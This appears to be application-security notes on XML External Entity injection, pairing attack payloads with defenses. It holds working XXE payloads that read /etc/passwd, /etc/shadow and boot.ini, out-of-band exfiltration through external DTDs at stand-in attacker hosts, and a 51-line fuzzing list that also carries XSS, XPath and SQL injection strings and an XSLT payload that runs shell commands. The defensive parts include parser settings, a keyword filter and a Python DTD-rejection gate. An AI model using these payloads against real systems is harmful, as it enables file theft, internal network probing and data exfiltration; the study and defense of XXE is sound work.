Application Security - XXE (XML External Entity Injection) Attack and Defense Notes
libxml 2.9.1 and later do not resolve external entities by default. For testing on Windows, use PHP 5.2 (libxml version 2.7.7) or PHP 5.3 (libxml version 2.7.8). On Linux, a libxml version lower than 2.9.1 has to be compiled into PHP; phpinfo() shows the libxml version in use.
External entity injection - via an external entity declaration in the DTD
payload-1
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY b SYSTEM "file://etc/passwd">]> <c>&b;</c>
payload-2
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<user>
<firstname>&xxe;</firstname>
<lastname>melody</lastname>
</user>
External entity injection - the DTD references an external DTD document, which in turn declares the external entity
<?xml version="1.0"?> <!DOCTYPE a SYSTEM "http://mark4z5.com/evil.dtd"> <c>&b;</c>
DTD content:
<!ENTITY b SYSTEM "file:///etc/passwd">
External entity injection - a parameter entity in the DTD pulls in the external entity declaration
<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY % d SYSTEM "http://mark4z5.com/evil.dtd"> %d; ]> <c>&b;</c>
DTD content:
<!ENTITY b SYSTEM "file:///etc/passwd">
Protocols supported in the XML DTD (by parser)
libxml2: file, http, ftp
PHP: file, http, ftp, php, compress.zlib, compress.bzip2, data, glob, phar
PHP, extension-dependent (extension in parentheses): https/ftps (openssl), zip (zip), ssh2.shell/ssh2.exec/ssh2.tunnel/ssh2.sftp/ssh2.scp (ssh2), rar (rar), ogg (oggvorbis), expect (expect)
Java: http, https, ftp, file, jar, netdoc, mailto, gopher*
.NET: file, http, https, ftp
Tool - Burp - Collaborator
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE copyright [ <!ENTITY test SYSTEM "http://<Collaborator-generated random value>"> ]>
XML statements
XML Schema entity attack - schemaLocation
XML Schema entity attack - noNamespaceSchemaLocation
XML Schema entity attack - XInclude
XML Schema entity attack - XSLT attack
XXE - read arbitrary files
XXE - execute system commands
XXE - probe internal network ports
XXE - attack internal network sites
XXE - DDoS attack
Defense - disable external entities
PHP:
libxml_disable_entity_loader(true);
Java:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python:
from lxml import etree
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))
Defense - filter user-submitted XML data
Keywords: <!DOCTYPE, <!ENTITY, SYSTEM, PUBLIC
Fuzzing
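The two defenses above (disable external entities; filter the DTD keywords) are easiest to get right when they are combined: refuse any untrusted document that carries a DTD at all, then hand the rest to a parser that does not resolve external entities. Note that the Java line shown above, setExpandEntityReferences(false) on its own, does not stop a JAXP parser from resolving external entities; the OWASP XXE prevention guidance is to disable the DOCTYPE outright with dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true), which is the same "no DTD from untrusted input" rule this gate enforces. The example below is added here and is not code from the original post; the function names (dtd_markers, parse_untrusted, naive_check), the XmlRejected exception and the sample inputs are all constructed for the demonstration. It also shows why the keyword filter must run on decoded text rather than raw bytes: the same payload re-encoded as UTF-16 slips past a byte-level search for "<!DOCTYPE" while libxml would still happily parse it.

```python
"""Pre-parse gate for untrusted XML: reject any DTD, then parse with the
standard library, which does not fetch external entities.
Added example; not part of the original post."""
import codecs
import re
import xml.etree.ElementTree as ET


class XmlRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or entity declaration."""


# The DTD keywords from the page's keyword-filter defense. XML itself is
# case-sensitive, so a lowercase <!doctype would not parse anyway; matching
# case-insensitively only makes the gate more conservative.
_DTD_MARKER = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)
_DECL_ENCODING = re.compile(rb'<\?xml[^>]*encoding=["\']([A-Za-z0-9._-]+)["\']')


def _decode(raw: bytes) -> str:
    """Decode the document the way an XML parser would pick its encoding:
    BOM first, then the UTF-16 shape of '<?', then the encoding= declaration,
    and UTF-8 as the default."""
    if raw.startswith(codecs.BOM_UTF8):
        return raw[len(codecs.BOM_UTF8):].decode("utf-8", "replace")
    if raw.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return raw.decode("utf-16", "replace")      # the codec consumes the BOM
    if raw.startswith(b"<\x00?\x00"):
        return raw.decode("utf-16-le", "replace")
    if raw.startswith(b"\x00<\x00?"):
        return raw.decode("utf-16-be", "replace")
    m = _DECL_ENCODING.match(raw)
    if m:
        try:
            return raw.decode(m.group(1).decode("ascii"), "replace")
        except LookupError:
            pass                                     # unknown encoding name: fall back
    return raw.decode("utf-8", "replace")


def dtd_markers(raw: bytes) -> list:
    """Return the DTD keywords present in the decoded document, in order.
    SYSTEM/PUBLIC only mean something inside a DTD, so they are reported
    only when a DOCTYPE or ENTITY declaration was found."""
    text = _decode(raw)
    found = [m.group(1).upper() for m in _DTD_MARKER.finditer(text)]
    if found:
        for keyword in ("SYSTEM", "PUBLIC"):
            if re.search(r"\b" + keyword + r"\b", text):
                found.append(keyword)
    return found


def naive_check(raw: bytes) -> bool:
    """The byte-substring check a quick fix often starts with; kept for contrast."""
    return b"<!DOCTYPE" in raw or b"<!ENTITY" in raw


def parse_untrusted(raw: bytes) -> ET.Element:
    """Gate, then parse. xml.etree never resolves external entities; with the
    DTD rejected up front there is nothing left for an &xxe; reference to expand."""
    markers = dtd_markers(raw)
    if markers:
        raise XmlRejected("DTD not allowed in untrusted XML: " + ", ".join(markers))
    return ET.fromstring(raw)


# Constructed sample inputs (not captured traffic).
PAYLOAD_1 = (b'<?xml version="1.0"?>'
             b'<!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd">]><c>&b;</c>')
# Same document re-encoded as UTF-16LE with a BOM; a parser still accepts it.
PAYLOAD_1_UTF16 = codecs.BOM_UTF16_LE + PAYLOAD_1.decode("ascii").encode("utf-16-le")
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>'
          b'<user><firstname>melody</firstname></user>')


if __name__ == "__main__":
    for name, doc in (("payload-1", PAYLOAD_1), ("payload-1/utf16", PAYLOAD_1_UTF16), ("benign", BENIGN)):
        print(name, "naive:", naive_check(doc), "decoded:", dtd_markers(doc))
    print("benign root element:", parse_untrusted(BENIGN).tag)
```

Running the block prints that the naive byte check flags payload-1 but misses its UTF-16 copy, while the decoded check reports DOCTYPE, ENTITY and SYSTEM for both; the benign document passes the gate and parses to a user root element. The gate is deliberately strict: a DOCTYPE hidden inside a CDATA section (as in the SOAP payload in the fuzzing list) is flagged too, which is the safe choice whenever the application might re-parse that text later.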
1. <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >
2. <?xml version="1.0" encoding="ISO-8859-1"?>
3. <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
4. <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
5. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
6. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
7. <?xml version="1.0" encoding="ISO-8859-1"?><test></test>
8. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
9. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
10. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo>
11. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]>
12. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
13. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
14. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
15. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
16. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo>
17. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]>
18. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
19. <test></test>
20. <![CDATA[<test></test>]]>
21. &foo;
22. %foo;
23. count(/child::node())
24. x' or name()='username' or 'x'='y
25. <name>','')); phpinfo(); exit;/*</name>
26. <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
27. <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
28. <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
29. <foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
30. <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
31. <foo><![CDATA[' or 1=1 or ''=']]></foo>
32. <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
33. <xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
34. <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
35. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
36. <xml SRC="xsstest.xml" ID=I></xml>
37. <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
38. <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
39. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet>
40. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet>
41. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet>
42. <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
43. <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
44. <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
45. <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]>
46. <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]>
47. <!ENTITY % int "<!ENTITY % trick SYSTEM 'http://127.0.0.1:80/?%file;'> "> %int;
48. <!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://127.0.0.1:21/%data3;'>">
49. <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
50. <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
51. <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
Detection tools
XXEinjector - Ruby-based